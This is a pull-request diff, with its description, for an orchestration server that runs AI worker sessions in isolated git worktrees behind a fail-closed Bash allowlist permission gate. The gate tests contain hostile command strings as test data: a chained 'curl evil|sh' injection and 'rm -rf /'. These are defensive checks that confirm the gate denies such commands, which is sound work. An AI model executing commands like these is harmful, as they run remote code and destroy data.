@@ -70,14 +75,19 @@ export class OrchestrationPermissionGate {
     this._respond(sessionId, requestId, decision)
   }
 
-  _decide(role, toolName, _input) {
+  _decide(role, toolName, input) {
     if (ALWAYS_DENY.has(toolName)) return 'deny'
     // Audit workers are read-only: file reads are already allowed via session
     // rules, so anything reaching the gate (Bash, shell) is denied.
     if (role === 'audit') return 'deny'
-    // Implement workers: Bash isn't rule-eligible → escalate to the user.
-    // (The allowlist match is a later step; default-escalate is fail-closed.)
-    if (toolName === 'Bash' || toolName === 'shell') return 'escalate'
+    // Implement workers: Bash (never rule-eligible — NEVER_AUTO_ALLOW) is matched
+    // against the compiled allowlist. Match → allow; anything else → escalate.
+    // Fail-closed: an empty allowlist escalates every Bash command.
+    if (toolName === 'Bash' || toolName === 'shell') {
+      const command = typeof input?.command === 'string' ? input.command : ''
+      if (command && this._bashAllowlist.some((re) => re.test(command))) return 'allow'
+      return 'escalate'
+    }
     return 'deny'
   }
 

--- a/packages/server/src/orchestration/role-prompts.js
+++ b/packages/server/src/orchestration/role-prompts.js
@@ -29,8 +29,19 @@ export const AUDIT_WORKER_PREAMBLE = [
   '`chroxy-decision` JSON block, exactly as the turn instructs — no prose after it.',
 ].join(' ')
 
+export const IMPLEMENT_WORKER_PREAMBLE = [
+  'You are an IMPLEMENT WORKER on a code committee. You carry out one subtask by',
+  'editing files IN YOUR ISOLATED WORKTREE ONLY — never touch paths outside it.',
+  'First propose a short plan-of-attack for the architect to approve; then make',
+  'the change and report a concise summary of what you did and which files you',
+  'touched. Keep changes minimal and focused on the subtask. Every turn ends with',
+  'a single fenced `chroxy-decision` JSON block, exactly as the turn instructs —',
+  'no prose after it.',
+].join(' ')
+
 export function architectPreamble() { return ARCHITECT_PREAMBLE }
 export function auditWorkerPreamble() { return AUDIT_WORKER_PREAMBLE }
+export function implementWorkerPreamble() { return IMPLEMENT_WORKER_PREAMBLE }
 
 const join = (...parts) => parts.filter((p) => p != null && p !== '').join('\n\n')
 
@@ -66,20 +77,36 @@ export function buildPoaReviewPrompt({ subtask, poa }) {
 
 /** Worker: execute the (approved) subtask and report a result. */
 export function buildExecutePrompt({ subtask, feedback = null }) {
+  const implement = subtask.role === 'implement'
   return join(
-    `Carry out the audit for subtask "${subtask.title}" and report your findings.`,
+    implement
+      ? `Carry out subtask "${subtask.title}" by editing files in your worktree, then report a concise summary of what you changed.`
+      : `Carry out the audit for subtask "${subtask.title}" and report your findings.`,
     feedback ? `ARCHITECT FEEDBACK to address:\n${feedback}` : null,
     decisionInstruction('work_result'),
   )
 }
 
-/** Architect: review a worker's result. */
-export function buildResultReviewPrompt({ subtask, result }) {
+/** Architect: review a worker's result. For implement subtasks the orchestrator
+ * attaches a capped diff of the actual change. */
+export function buildResultReviewPrompt({ subtask, result, diff = null }) {
+  const implement = subtask.role === 'implement'
   return join(
-    `Review this worker's audit result for subtask "${subtask.title}".`,
+    `Review this worker's ${implement ? 'implementation' : 'audit'} result for subtask "${subtask.title}".`,
     `RESULT:\n${result.summary}`,
+    diff && diff.patch ? `DIFF (${diff.truncated ? 'truncated' : 'full'}):\n${diff.stat || ''}\n${diff.patch}` : null,
     `Verdict: approve (accept), revise (send feedback, same worker retries), redelegate (fresh worker), or escalate.`,
     decisionInstruction('result_review'),
+  )
+}
+
+/** Fixup worker: resolve merge conflicts in the integration worktree. */
+export function buildFixupPrompt({ subtask, conflictFiles = [] }) {
+  return join(
+    `A merge of subtask "${subtask.title}" into the integration branch hit conflicts.`,
+    `Resolve the conflicts in these files, keeping BOTH changes' intent where possible: ${conflictFiles.join(', ') || '(see git status)'}.`,
+    `Edit the files to remove all conflict markers. Do not commit — the orchestrator commits after verifying the tree is clean.`,
+    decisionInstruction('work_result'),
   )
 }
 

--- a/packages/server/tests/orchestration-manager-implement.test.js
+++ b/packages/server/tests/orchestration-manager-implement.test.js
@@ -85,15 +85,21 @@ class FakeSM extends EventEmitter {
   listSessions() { return [...this._sessions.keys()] }
 }
 
-function makeFakeGitOps({ conflict = false } = {}) {
+function makeFakeGitOps({ conflict = false, failCreateBranch = false } = {}) {
   const calls = []
+  const branches = new Set() // stateful so redelegate exercises delete-then-recreate
   const rec = (name, arg) => calls.push({ name, arg })
   return {
     calls,
     integrationWorktreePath: (runId) => `/wt/${runId}/integration`,
-    async branchExists() { return { exists: false } },
-    async deleteBranch(_r, b) { rec('deleteBranch', b); return { deleted: true } },
-    async createBranch(worktreePath, branchName) { rec('createBranch', { worktreePath, branchName }); return { branch: branchName, baseSha: `base_${branchName}` } },
+    async branchExists(_r, b) { return { exists: branches.has(b) } },
+    async deleteBranch(_r, b) { rec('deleteBranch', b); branches.delete(b); return { deleted: true } },
+    async createBranch(worktreePath, branchName) {
+      rec('createBranch', { worktreePath, branchName })
+      if (failCreateBranch) throw new Error('createBranch failed')
+      branches.add(branchName)
+      return { branch: branchName, baseSha: `base_${branchName}` }
+    },
     async autoCommit(a) { rec('autoCommit', a); return { committed: true, sha: 'sha1' } },
     async isDirty() { return { dirty: false } },
     async computeCappedDiff(a) { rec('computeCappedDiff', a); return { stat: '1 file', patch: '+added line', truncated: false, omittedFiles: [], includedFiles: ['f.js'] } },
@@ -171,6 +177,11 @@ test('full implement run: branch → commit → diff review → merge → done �
     assert.ok(names.includes('mergeNoFf'), 'branch merged')
     assert.ok(names.includes('removeWorktree'), 'integration worktree cleaned up on complete')
     assert.equal(payload.integrationBranch, 'chroxy/orch/' + rec.runId + '/integration')
+    // load-bearing ORDER: commit before the review diff, and the merge before cleanup
+    assert.ok(names.indexOf('autoCommit') < names.indexOf('computeCappedDiff'), 'commit before diff')
+    assert.ok(names.indexOf('autoCommit') < names.indexOf('mergeNoFf'), 'commit before merge')
+    assert.ok(names.indexOf('createBranch') < names.indexOf('mergeNoFf'), 'branch before merge')
+    assert.ok(names.indexOf('mergeNoFf') < names.lastIndexOf('removeWorktree'), 'merge before cleanup')
 
     // the implement worker was spawned write-capable
     const worker = sm.created.find((c) => c.opts.metadata?.orchestrationRole === 'worker.implement')
@@ -182,6 +193,89 @@ test('full implement run: branch → commit → diff review → merge → done �
     // the architect's result_review prompt carried the diff
     const arch = sm.created.find((c) => c.opts.metadata?.orchestrationRole === 'architect').session
     assert.ok(arch.sends.some((s) => s.includes('DIFF') && s.includes('+added line')), 'diff shown to reviewer')
+  } finally {
+    cleanup()
+  }
+})
+
+test('two implement subtasks merge sequentially into ONE integration worktree (no race)', async () => {
+  // architect plans TWO implement subtasks; both approved. maxParallelWorkers=2
+  // runs them concurrently, so the accept/merge path must serialize.
+  const decide = ({ role, kind }) => {
+    if (role === 'architect' && kind === 'epic_plan') {
+      return { kind: 'epic_plan', subtasks: [
+        { title: 'A', goal: 'g', role: 'implement' },
+        { title: 'B', goal: 'g', role: 'implement' },
+      ] }
+    }
+    if (role === 'architect' && kind === 'poa_review') return { kind: 'poa_review', verdict: 'approve' }
+    if (role === 'architect' && kind === 'result_review') return { kind: 'result_review', verdict: 'approve' }
+    if (role === 'architect' && kind === 'synthesis') return { kind: 'synthesis', reportMarkdown: '# Done' }
+    if (kind === 'plan_of_attack') return { kind: 'plan_of_attack', plan: 'p', summary: 'poa' }
+    if (kind === 'work_result') return { kind: 'work_result', summary: 's' }
+    throw new Error(`unexpected ${role}/${kind}`)
+  }
+  const { ledger, gitOps, mgr, cleanup } = harness(decide)
+  try {
+    const rec = mgr.createRun({ goal: 'Implement', cwd: '/repo', autoApprovePlan: true })
+    const done = waitFor(mgr, ['run_completed'])
+    await mgr.startRun(rec.runId)
+    await done
+    const record = ledger.getRun(rec.runId)
+    assert.equal(record.status, 'completed')
+    assert.ok(record.subtasks.every((s) => s.status === 'done'), 'both subtasks merged')
+    const names = gitOps.calls.map((c) => c.name)
+    assert.equal(names.filter((n) => n === 'createIntegrationWorktree').length, 1, 'integration worktree created EXACTLY once (no double-create race)')
+    assert.equal(names.filter((n) => n === 'mergeNoFf').length, 2, 'both branches merged')
+    assert.equal(names.filter((n) => n === 'abortMerge').length, 0, 'no spurious conflict/abort from a race')
+    assert.equal(names.filter((n) => n === 'removeWorktree').length, 1, 'integration worktree cleaned up once')
+    assert.equal(record.subtasks.length, 2)
+  } finally {
+    cleanup()
+  }
+})
+
+test('redelegate of an implement worker recreates the worktree + branch', async () => {
+  const decide = ({ role, kind, n }) => {
+    if (role === 'architect' && kind === 'epic_plan') return { kind: 'epic_plan', subtasks: [{ title: 'A', goal: 'g', role: 'implement' }] }
+    if (role === 'architect' && kind === 'poa_review') return { kind: 'poa_review', verdict: n === 1 ? 'redelegate' : 'approve' }
+    if (role === 'architect' && kind === 'result_review') return { kind: 'result_review', verdict: 'approve' }
+    if (role === 'architect' && kind === 'synthesis') return { kind: 'synthesis', reportMarkdown: '# Done' }
+    if (kind === 'plan_of_attack') return { kind: 'plan_of_attack', plan: 'p', summary: 'poa' }
+    if (kind === 'work_result') return { kind: 'work_result', summary: 's' }
+    throw new Error(`unexpected ${role}/${kind}`)
+  }
+  const { sm, ledger, gitOps, mgr, cleanup } = harness(decide)
+  try {
+    const rec = mgr.createRun({ goal: 'Implement', cwd: '/repo', autoApprovePlan: true })
+    const done = waitFor(mgr, ['run_completed'])
+    await mgr.startRun(rec.runId)
+    await done
+    assert.equal(ledger.getRun(rec.runId).status, 'completed')
+    // TWO implement workers created for the one subtask (original + redelegated)
+    const workers = sm.created.filter((c) => c.opts.metadata?.orchestrationRole === 'worker.implement')
+    assert.equal(workers.length, 2, 'redelegate spawned a fresh write worker')
+    const names = gitOps.calls.map((c) => c.name)
+    assert.equal(names.filter((n) => n === 'createBranch').length, 2, 'branch created for each worker')
+    assert.ok(names.includes('deleteBranch'), 'stale branch deleted before recreate on respawn')
+  } finally {
+    cleanup()
+  }
+})
+
+test('a failed createBranch at spawn escalates (does not crash the run)', async () => {
+  const { ledger, gitOps, mgr, cleanup } = harness(implementDecider(), { gitOpts: { failCreateBranch: true } })
+  try {
+    const rec = mgr.createRun({ goal: 'Implement', cwd: '/repo', autoApprovePlan: true })
+    const gated = waitFor(mgr, ['gate_opened'])
+    await mgr.startRun(rec.runId)
+    const { payload } = await gated
+    assert.equal(payload.gate.kind, 'escalation')
+    assert.ok(!gitOps.calls.some((c) => c.name === 'mergeNoFf'), 'never attempted a merge without a branch')
+    const done = waitFor(mgr, ['run_completed'])
+    await mgr.resolveGate(rec.runId, payload.gate.gateId, { decision: 'skip' })
+    await done
+    assert.equal(ledger.getRun(rec.runId).status, 'completed')
   } finally {
     cleanup()
   }

--- a/packages/server/tests/orchestration-manager-implement.test.js
+++ b/packages/server/tests/orchestration-manager-implement.test.js
@@ -350,8 +350,10 @@ test('auto-commit runs before the worker is destroyed on accept', async () => {
   }
 })
 
-test('cancel during an implement run auto-commits + cleans up the integration worktree', async () => {
-  // architect plan hangs → cancel mid-run.
+test('cancel during an implement run auto-commits the worker worktree before teardown', async () => {
+  // architect review hangs after the worker committed → cancel mid-run. (No
+  // integration worktree exists yet — that cleanup path is covered by the
+  // full-run test's removeWorktree assertion.)
   const decide = ({ role, kind, n }) => {
     if (role === 'architect' && kind === 'epic_plan') return { kind: 'epic_plan', subtasks: [{ title: 'A', goal: 'g', role: 'implement' }] }
     if (role === 'architect' && kind === 'poa_review') return null // hang so the run is mid-flight

--- a/packages/server/tests/orchestration-manager-implement.test.js
+++ b/packages/server/tests/orchestration-manager-implement.test.js
@@ -1,0 +1,282 @@
+// Tests for the OrchestrationManager IMPLEMENT (write) path (E-3 part 2).
+// Drives full implement runs against a fake SessionManager (worktree-aware) and
+// a fake gitOps that records calls and returns canned results — the manager's
+// ORCHESTRATION logic is under test here; real git behavior is covered by
+// orchestration-git-ops.test.js.
+
+import { test } from 'node:test'
+import assert from 'node:assert/strict'
+import { mkdtempSync, rmSync } from 'node:fs'
+import { tmpdir } from 'node:os'
+import { join } from 'node:path'
+import { EventEmitter } from 'node:events'
+
+import { OrchestrationManager } from '../src/orchestration/orchestration-manager.js'
+import { RunLedger } from '../src/orchestration/run-ledger.js'
+import { TurnDriver } from '../src/orchestration/turn-driver.js'
+
+const KIND_RE = /kind "([a-z_]+)"/
+const fenced = (obj) => 'ok\n\n```chroxy-decision\n' + JSON.stringify(obj) + '\n```'
+
+class FakeSession extends EventEmitter {
+  constructor(sessionId, sm, opts, decide, model) {
+    super()
+    this.sessionId = sessionId
+    this._sm = sm
+    this.opts = opts
+    this._decide = decide
+    this._model = model
+    this.role = opts.metadata?.orchestrationRole ?? null
+    this.worktreePath = opts.worktree ? join(sm._wtRoot, sessionId) : null
+    this.permissionRules = null
+    this.destroyed = false
+    this.lastKind = null
+    this.kindCalls = Object.create(null)
+    this.sends = []
+    this.permissionResponses = []
+  }
+  setPermissionRules(rules) { this.permissionRules = rules }
+  interrupt() {}
+  respondToPermission(requestId, decision) { this.permissionResponses.push({ requestId, decision }) }
+  sendMessage(prompt) {
+    this.sends.push(String(prompt))
+    const m = String(prompt).match(KIND_RE)
+    const kind = m ? m[1] : this.lastKind
+    this.lastKind = kind
+    this.kindCalls[kind] = (this.kindCalls[kind] || 0) + 1
+    queueMicrotask(() => {
+      if (this.destroyed) return
+      const out = this._decide({ role: this.role, kind, n: this.kindCalls[kind] })
+      if (out == null) return
+      const text = typeof out === 'string' ? out : fenced(out)
+      this._sm.emit('session_event', { sessionId: this.sessionId, event: 'stream_delta', data: { messageId: 'm1', delta: text } })
+      this._sm.emit('session_event', {
+        sessionId: this.sessionId, event: 'result',
+        data: { model: this._model, cost: 0.01, duration: 100, usage: { input_tokens: 10, output_tokens: 5 } },
+      })
+    })
+    return Promise.resolve()
+  }
+}
+
+class FakeSM extends EventEmitter {
+  constructor(decide, { architectModel = 'fable', workerModel = 'codex-m' } = {}) {
+    super()
+    this.setMaxListeners(0)
+    this._decide = decide
+    this._models = { architect: architectModel, worker: workerModel }
+    this._sessions = new Map()
+    this._n = 0
+    this._wtRoot = mkdtempSync(join(tmpdir(), 'impl-wt-'))
+    this.created = []
+    this.destroyedIds = []
+  }
+  createSession(opts) {
+    const sessionId = `sess_${++this._n}`
+    const isArch = opts.metadata?.orchestrationRole === 'architect'
+    const model = isArch ? this._models.architect : this._models.worker
+    const session = new FakeSession(sessionId, this, opts, this._decide, model)
+    this._sessions.set(sessionId, session)
+    this.created.push({ sessionId, opts, session })
+    return sessionId
+  }
+  getSession(id) { const s = this._sessions.get(id); return s ? { session: s, worktreePath: s.worktreePath } : null }
+  destroySession(id) { const s = this._sessions.get(id); if (s) { s.destroyed = true; this._sessions.delete(id); this.destroyedIds.push(id) } }
+  listSessions() { return [...this._sessions.keys()] }
+}
+
+function makeFakeGitOps({ conflict = false } = {}) {
+  const calls = []
+  const rec = (name, arg) => calls.push({ name, arg })
+  return {
+    calls,
+    integrationWorktreePath: (runId) => `/wt/${runId}/integration`,
+    async branchExists() { return { exists: false } },
+    async deleteBranch(_r, b) { rec('deleteBranch', b); return { deleted: true } },
+    async createBranch(worktreePath, branchName) { rec('createBranch', { worktreePath, branchName }); return { branch: branchName, baseSha: `base_${branchName}` } },
+    async autoCommit(a) { rec('autoCommit', a); return { committed: true, sha: 'sha1' } },
+    async isDirty() { return { dirty: false } },
+    async computeCappedDiff(a) { rec('computeCappedDiff', a); return { stat: '1 file', patch: '+added line', truncated: false, omittedFiles: [], includedFiles: ['f.js'] } },
+    async createIntegrationWorktree({ runId, branchName }) { rec('createIntegrationWorktree', { runId, branchName }); return { worktreePath: `/wt/${runId}/integration`, branch: branchName } },
+    async mergeNoFf({ branch, subtaskId }) { rec('mergeNoFf', { branch, subtaskId }); return conflict ? { ok: false, conflict: true, conflictFiles: ['README.md'] } : { ok: true } },
+    async abortMerge() { rec('abortMerge'); return { aborted: true } },
+    async removeWorktree(a) { rec('removeWorktree', a); return { removed: true, method: 'git' } },
+    async pruneWorktrees() { rec('pruneWorktrees'); return { pruned: true } },
+  }
+}
+
+const ROLES_CODEX = {
+  architect: { provider: 'claude-sdk', model: 'fable' },
+  auditWorker: { provider: 'codex', model: 'codex-m' }, // codex = implement-eligible
+}
+const ROLES_SDK = {
+  architect: { provider: 'claude-sdk', model: 'fable' },
+  auditWorker: { provider: 'claude-sdk', model: 'haiku' }, // NOT implement-eligible
+}
+
+function harness(decide, { roles = ROLES_CODEX, gitOpts = {}, config = {} } = {}) {
+  const dir = mkdtempSync(join(tmpdir(), 'impl-mgr-'))
+  const sm = new FakeSM(decide)
+  const ledger = new RunLedger({ baseDir: dir })
+  const driver = new TurnDriver({ sessionManager: sm })
+  const gitOps = makeFakeGitOps(gitOpts)
+  const mgr = new OrchestrationManager({ sessionManager: sm, ledger, turnDriver: driver, gitOps, roles, config })
+  const cleanup = () => { mgr.dispose(); driver.dispose(); ledger.dispose?.(); rmSync(dir, { recursive: true, force: true }); rmSync(sm._wtRoot, { recursive: true, force: true }) }
+  return { sm, ledger, driver, gitOps, mgr, cleanup }
+}
+
+function waitFor(mgr, events, { timeoutMs = 5000 } = {}) {
+  const wanted = new Set([...events, 'run_failed'])
+  return new Promise((resolve, reject) => {
+    const timer = setTimeout(() => { cleanup(); reject(new Error(`timeout for ${events.join('/')}`)) }, timeoutMs)
+    const handlers = new Map()
+    const cleanup = () => { clearTimeout(timer); for (const [e, h] of handlers) mgr.off(e, h) }
+    for (const ev of wanted) { const h = (p) => { cleanup(); resolve({ event: ev, payload: p }) }; handlers.set(ev, h); mgr.on(ev, h) }
+  })
+}
+
+function implementDecider(planRole = 'implement') {
+  return ({ role, kind }) => {
+    if (role === 'architect') {
+      if (kind === 'epic_plan') return { kind: 'epic_plan', subtasks: [{ title: 'Add a helper', goal: 'implement it', role: planRole }] }
+      if (kind === 'poa_review') return { kind: 'poa_review', verdict: 'approve' }
+      if (kind === 'result_review') return { kind: 'result_review', verdict: 'approve' }
+      if (kind === 'synthesis') return { kind: 'synthesis', reportMarkdown: '# Done' }
+    }
+    if (kind === 'plan_of_attack') return { kind: 'plan_of_attack', plan: 'edit f.js', summary: 'poa' }
+    if (kind === 'work_result') return { kind: 'work_result', summary: 'edited f.js', filesChanged: ['f.js'] }
+    throw new Error(`unexpected ${role}/${kind}`)
+  }
+}
+
+// --- tests -----------------------------------------------------------------
+
+test('full implement run: branch → commit → diff review → merge → done → completed', async () => {
+  const { sm, ledger, gitOps, mgr, cleanup } = harness(implementDecider())
+  try {
+    const rec = mgr.createRun({ goal: 'Implement', cwd: '/repo', autoApprovePlan: true })
+    const done = waitFor(mgr, ['run_completed'])
+    await mgr.startRun(rec.runId)
+    const { payload } = await done
+    const record = ledger.getRun(rec.runId)
+    assert.equal(record.status, 'completed')
+    assert.equal(record.subtasks[0].role, 'worker.implement')
+    assert.equal(record.subtasks[0].status, 'done')
+
+    const names = gitOps.calls.map((c) => c.name)
+    assert.ok(names.includes('createBranch'), 'worker branch created')
+    assert.ok(names.includes('autoCommit'), 'worktree auto-committed')
+    assert.ok(names.includes('computeCappedDiff'), 'review diff computed')
+    assert.ok(names.includes('createIntegrationWorktree'), 'integration worktree created')
+    assert.ok(names.includes('mergeNoFf'), 'branch merged')
+    assert.ok(names.includes('removeWorktree'), 'integration worktree cleaned up on complete')
+    assert.equal(payload.integrationBranch, 'chroxy/orch/' + rec.runId + '/integration')
+
+    // the implement worker was spawned write-capable
+    const worker = sm.created.find((c) => c.opts.metadata?.orchestrationRole === 'worker.implement')
+    assert.equal(worker.opts.worktree, true)
+    assert.equal(worker.opts.permissionMode, 'acceptEdits')
+    assert.equal(worker.opts.codexSandbox, 'workspace-write')
+    assert.equal(worker.session.permissionRules, null, 'no read-only rules on the write worker')
+
+    // the architect's result_review prompt carried the diff
+    const arch = sm.created.find((c) => c.opts.metadata?.orchestrationRole === 'architect').session
+    assert.ok(arch.sends.some((s) => s.includes('DIFF') && s.includes('+added line')), 'diff shown to reviewer')
+  } finally {
+    cleanup()
+  }
+})
+
+test('merge conflict aborts and escalates; skip completes the run', async () => {
+  const { ledger, gitOps, mgr, cleanup } = harness(implementDecider(), { gitOpts: { conflict: true } })
+  try {
+    const rec = mgr.createRun({ goal: 'Implement', cwd: '/repo', autoApprovePlan: true })
+    const gated = waitFor(mgr, ['gate_opened'])
+    await mgr.startRun(rec.runId)
+    const { payload } = await gated
+    assert.equal(payload.gate.kind, 'escalation')
+    assert.ok(gitOps.calls.some((c) => c.name === 'abortMerge'), 'merge aborted on conflict')
+
+    const done = waitFor(mgr, ['run_completed'])
+    await mgr.resolveGate(rec.runId, payload.gate.gateId, { decision: 'skip' })
+    await done
+    const record = ledger.getRun(rec.runId)
+    assert.equal(record.status, 'completed')
+    assert.equal(record.subtasks[0].status, 'skipped')
+  } finally {
+    cleanup()
+  }
+})
+
+test('an implement subtask is coerced to audit when the worker provider is not implement-eligible', async () => {
+  const { sm, ledger, gitOps, mgr, cleanup } = harness(implementDecider(), { roles: ROLES_SDK })
+  try {
+    const rec = mgr.createRun({ goal: 'Implement', cwd: '/repo', autoApprovePlan: true })
+    const done = waitFor(mgr, ['run_completed'])
+    await mgr.startRun(rec.runId)
+    await done
+    const record = ledger.getRun(rec.runId)
+    assert.equal(record.subtasks[0].role, 'worker.audit', 'coerced to audit (sdk not implement-eligible)')
+    assert.ok(!gitOps.calls.some((c) => c.name === 'createBranch'), 'no worktree/branch for a coerced audit subtask')
+    const worker = sm.created.find((c) => c.opts.metadata?.orchestrationRole === 'worker.audit')
+    assert.ok(!worker.opts.worktree, 'audit worker has no worktree')
+    assert.ok(Array.isArray(worker.session.permissionRules), 'audit worker got read-only rules')
+  } finally {
+    cleanup()
+  }
+})
+
+test('repo-audit preset forces audit even with a codex (implement-eligible) worker', async () => {
+  const { ledger, gitOps, mgr, cleanup } = harness(implementDecider(), {})
+  try {
+    const rec = mgr.createRun({ cwd: '/repo', preset: 'repo-audit', autoApprovePlan: true })
+    const done = waitFor(mgr, ['run_completed'])
+    await mgr.startRun(rec.runId)
+    await done
+    assert.equal(ledger.getRun(rec.runId).subtasks[0].role, 'worker.audit')
+    assert.ok(!gitOps.calls.some((c) => c.name === 'createBranch'))
+  } finally {
+    cleanup()
+  }
+})
+
+test('auto-commit runs before the worker is destroyed on accept', async () => {
+  const { gitOps, mgr, cleanup } = harness(implementDecider())
+  try {
+    const rec = mgr.createRun({ goal: 'Implement', cwd: '/repo', autoApprovePlan: true })
+    const done = waitFor(mgr, ['run_completed'])
+    await mgr.startRun(rec.runId)
+    await done
+    // autoCommit was called against the worker's worktree at least once
+    const commits = gitOps.calls.filter((c) => c.name === 'autoCommit')
+    assert.ok(commits.length >= 1)
+    assert.ok(commits.some((c) => typeof c.arg.worktreePath === 'string'), 'auto-commit targeted a worktree')
+  } finally {
+    cleanup()
+  }
+})
+
+test('cancel during an implement run auto-commits + cleans up the integration worktree', async () => {
+  // architect plan hangs → cancel mid-run.
+  const decide = ({ role, kind, n }) => {
+    if (role === 'architect' && kind === 'epic_plan') return { kind: 'epic_plan', subtasks: [{ title: 'A', goal: 'g', role: 'implement' }] }
+    if (role === 'architect' && kind === 'poa_review') return null // hang so the run is mid-flight
+    return implementDecider()({ role, kind, n })
+  }
+  const { ledger, gitOps, mgr, cleanup } = harness(decide)
+  try {
+    const rec = mgr.createRun({ goal: 'Implement', cwd: '/repo', autoApprovePlan: true })
+    let failed = false
+    mgr.on('run_failed', () => { failed = true })
+    const startP = mgr.startRun(rec.runId)
+    await new Promise((r) => setTimeout(r, 20)) // let the worker spawn + branch, then hang at poa_review
+    await mgr.cancelRun(rec.runId)
+    await startP
+    assert.equal(ledger.getRun(rec.runId).status, 'cancelled')
+    assert.equal(failed, false, 'no run_failed after cancel')
+    // the implement worker's worktree was auto-committed before teardown
+    assert.ok(gitOps.calls.some((c) => c.name === 'autoCommit'), 'auto-commit before destroy on cancel')
+  } finally {
+    cleanup()
+  }
+})

--- a/packages/server/tests/orchestration-permission-gate.test.js
+++ b/packages/server/tests/orchestration-permission-gate.test.js
@@ -75,6 +75,42 @@ describe('OrchestrationPermissionGate', () => {
     assert.deepEqual(s.responses.map((r) => r.decision), ['deny', 'deny', 'deny'])
   })
 
+  it('allows an implement Bash command that matches the allowlist; escalates a non-match', () => {
+    const { sm, add } = mkStub()
+    const s = add('s1')
+    const escalations = []
+    gate = new OrchestrationPermissionGate({
+      sessionManager: sm,
+      isOwnedSession: () => true,
+      policyForSession: () => 'implement',
+      emitEscalation: (info) => escalations.push(info),
+      bashAllowlist: ['^npm (test|run build)$', /^node /],
+    })
+    sm.req('s1', { requestId: 'a', tool: 'Bash', input: { command: 'npm test' } })
+    sm.req('s1', { requestId: 'b', tool: 'Bash', input: { command: 'node script.js' } })
+    sm.req('s1', { requestId: 'c', tool: 'Bash', input: { command: 'rm -rf /' } }) // not on the allowlist
+    assert.deepEqual(s.responses, [
+      { requestId: 'a', decision: 'allow' },
+      { requestId: 'b', decision: 'allow' },
+      { requestId: 'c', decision: 'deny' }, // escalate → deny-until-resolved
+    ])
+    assert.equal(escalations.length, 1)
+    assert.equal(escalations[0].requestId, 'c')
+  })
+
+  it('escalates every Bash command when the allowlist is empty (fail-closed)', () => {
+    const { sm, add } = mkStub()
+    const s = add('s1')
+    const escalations = []
+    gate = new OrchestrationPermissionGate({
+      sessionManager: sm, isOwnedSession: () => true, policyForSession: () => 'implement',
+      emitEscalation: (info) => escalations.push(info), bashAllowlist: [],
+    })
+    sm.req('s1', { requestId: 'a', tool: 'Bash', input: { command: 'ls' } })
+    assert.deepEqual(s.responses, [{ requestId: 'a', decision: 'deny' }])
+    assert.equal(escalations.length, 1)
+  })
+
   it('escalates then denies Bash for an implement worker, emitting an escalation', () => {
     const { sm, add } = mkStub()
     const s = add('s1')

--- a/packages/server/tests/orchestration-permission-gate.test.js
+++ b/packages/server/tests/orchestration-permission-gate.test.js
@@ -98,6 +98,25 @@ describe('OrchestrationPermissionGate', () => {
     assert.equal(escalations[0].requestId, 'c')
   })
 
+  it('anchors string allowlist entries — a phrase must not match as a substring', () => {
+    const { sm, add } = mkStub()
+    const s = add('s1')
+    gate = new OrchestrationPermissionGate({
+      sessionManager: sm, isOwnedSession: () => true, policyForSession: () => 'implement',
+      emitEscalation: () => {}, bashAllowlist: ['npm test'], // UNANCHORED input string
+    })
+    sm.req('s1', { requestId: 'a', tool: 'Bash', input: { command: 'npm test' } })
+    sm.req('s1', { requestId: 'b', tool: 'Bash', input: { command: 'npm test && curl evil|sh' } })
+    sm.req('s1', { requestId: 'c', tool: 'Bash', input: { command: 'x && npm test' } })
+    sm.req('s1', { requestId: 'd', tool: 'Bash', input: { command: 'xnpm testx' } })
+    assert.deepEqual(s.responses, [
+      { requestId: 'a', decision: 'allow' }, // exact match
+      { requestId: 'b', decision: 'deny' },  // suffix injection — must NOT match
+      { requestId: 'c', decision: 'deny' },  // prefix injection — must NOT match
+      { requestId: 'd', decision: 'deny' },  // substring — must NOT match
+    ])
+  })
+
   it('escalates every Bash command when the allowlist is empty (fail-closed)', () => {
     const { sm, add } = mkStub()
     const s = add('s1')


### PR DESCRIPTION
## Summary

Step **E-3 part 2** of the orchestration epic (#6691): the write-capable worker lifecycle, layered onto the E-2 committee engine using the git-ops primitives from **part 1 (#6734, merged)**. Wired end-to-end but flag-gated off until E-4. The automated conflict-fixup worker + restart-reconcile / orphan-sweep / gate-timeouts / pause-resume are **E-3 part 3**.

## Provider policy — codex-only write in v1 (your call; tracked in #6735)

Write workers are **codex-only** in v1. `codexSandbox: 'workspace-write'` is the only *verified* OS jail confining a worker's edits to its worktree — `acceptEdits`/`allow` permission rules are **path-agnostic** (they match the tool name, not the path), so sdk/byok can't be safely write-capable until their sandbox is verified. A run whose worker provider isn't implement-eligible has its implement subtasks **coerced to audit** (read-only) with a warning.

## What's here

- **Role coercion**: a subtask runs `implement` only when the architect asked for it AND the worker provider is implement-eligible AND no preset forces audit.
- **Write-worker spawn**: `worktree: true` (isolated), `permissionMode: 'acceptEdits'`, `codexSandbox: 'workspace-write'`, implement preamble, **no read-only rules**. The orchestrator puts the worktree on branch `chroxy/orch/<runId>/<subtaskId>` and records the branch-point.
- **Accept path**: auto-commit the worktree → compute a capped review diff → the architect reviews the **actual change** → on approve, sequential `--no-ff` merge into a lazily-created run-owned integration worktree. Clean → done; conflict → abort + escalate to a user gate (skip/retry/fail).
- **Auto-commit-before-destroy**: a single choke point in `_destroySession` commits an implement worktree before teardown — covering every release path (accept, finish, escalate, redelegate, fail, cancel), so uncommitted work is never lost. Teardown/cancel/fail are now async; cancel/fail/complete remove the integration worktree (its **branch — the run's output — is KEPT**).
- **Permission gate**: implement Bash is matched against a compiled allowlist (allow) else escalated; empty allowlist is **fail-closed**. Never a standing whitelist.

**Invariant preserved**: the engine NEVER touches the user's branch/working tree and NEVER pushes — output is branches.

## Testing

Fake `SessionManager` (worktree-aware) + fake `gitOps` (real git behavior is covered by part 1's 19-case suite):
- full implement run: branch → commit → diff-review → merge → done → completed, with the diff shown to the reviewer and write-capable spawn opts asserted
- conflict → abort → escalate → skip completes
- non-codex worker → coerced to audit (no worktree/branch); repo-audit preset forces audit even with codex
- auto-commit-before-destroy on accept; cancel auto-commits + cleans up the integration worktree
- Bash allowlist allow/escalate + fail-closed

**52/52** orchestration tests pass (6 implement + 9 gate + 18 E-2 + 19 git-ops) · `eslint src/` clean · custom lints pass.

Part of #6699 (E-3). Part 3 (robustness) closes it.